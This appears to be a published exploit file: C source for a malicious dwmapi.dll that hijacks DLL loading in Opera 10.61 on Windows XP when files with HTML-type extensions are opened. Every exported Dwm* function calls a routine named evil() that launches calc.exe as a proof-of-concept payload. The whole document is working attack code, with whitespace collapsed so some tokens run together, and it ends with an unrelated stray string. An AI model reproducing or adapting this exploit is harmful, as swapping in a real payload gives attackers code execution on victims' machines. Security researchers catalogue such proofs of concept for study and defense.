/* Exploit Title: Opera DLL Hijacking Exploit ( dwmapi.dll ) Date: 24/08/2010 Author: Nicolas Krassas http://twitter.com/Dinosn Version: Opera 10.61 Tested on: Windows XP SP3 The code is based on the exploit from "TheLeader" Vulnerable extensions: .htm .mht .mhtml .xht .xhtm .xhtl dwmapi.dll is used in other applications too */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT voidDwmDefWindowProc() { evil(); } DLLIMPORT voidDwmEnableBlurBehindWindow() { evil(); } DLLIMPORT voidDwmEnableComposition() { evil(); } DLLIMPORT voidDwmEnableMMCSS() { evil(); } DLLIMPORT voidDwmExtendFrameIntoClientArea() { evil(); } DLLIMPORT voidDwmGetColorizationColor() { evil(); } DLLIMPORT voidDwmGetCompositionTimingInfo() { evil(); } DLLIMPORT voidDwmGetWindowAttribute() { evil(); } DLLIMPORT voidDwmIsCompositionEnabled() { evil(); } DLLIMPORT voidDwmModifyPreviousDxFrameDuration() { evil(); } DLLIMPORT voidDwmQueryThumbnailSourceSize() { evil(); } DLLIMPORT voidDwmRegisterThumbnail() { evil(); } DLLIMPORT voidDwmSetDxFrameDuration() { evil(); } DLLIMPORT voidDwmSetPresentParameters() { evil(); } DLLIMPORT voidDwmSetWindowAttribute() { evil(); } DLLIMPORT voidDwmUnregisterThumbnail() { evil(); } DLLIMPORT voidDwmUpdateThumbnailProperties() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; }
体验盒子
